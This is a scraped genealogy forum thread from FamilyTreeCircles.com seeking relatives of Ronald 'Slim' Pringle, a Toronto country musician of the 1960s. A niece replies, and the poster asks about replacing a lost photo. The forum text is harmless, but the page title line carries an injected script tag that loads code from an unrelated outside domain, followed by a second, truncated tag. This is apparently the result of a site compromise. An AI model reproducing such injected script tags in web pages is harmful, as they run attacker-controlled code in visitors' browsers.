looking for relatives of ronald pringle.....all i know for sure is that he lived in toronto about 1965....played country music in toronto clubs....300 club.....the hunters<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script sr :: FamilyTreeCircles.com Genealogy
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looking for relatives of ronald pringle.....all i know for sure is that he lived in toronto about 1965....played country music in toronto clubs....300 club.....the hunters

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by deborah4110 Profile | Research | Contact | Subscribe | Block this user
on 2013-02-19 17:49:05

deborah4110 has been a Family Tree Circles member since Feb 2013.

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by deborah4110 on 2013-02-19 17:49:27

by deborah4110 on 2013-02-20 19:06:56

ron slim pringle

by AnnaP on 2016-08-20 23:30:41

Ron is my my Uncle

by AnnaP on 2016-08-20 23:31:00

Ron is my my Uncle

by deborah4110 on 2016-10-20 23:21:47

My name is debbie... I met Ron in 1975.....he gave me a picture of him and another fellow. It said the hunters on the bottem.....I had a fire and lost the picture....I was hoping to replace the picture and no idea how to do so....is it possible to get another copy....

by deborah4110 on 2016-10-20 23:22:00

My name is debbie... I met Ron in 1975.....he gave me a picture of him and another fellow. It said the hunters on the bottem.....I had a fire and lost the picture....I was hoping to replace the picture and no idea how to do so....is it possible to get another copy....

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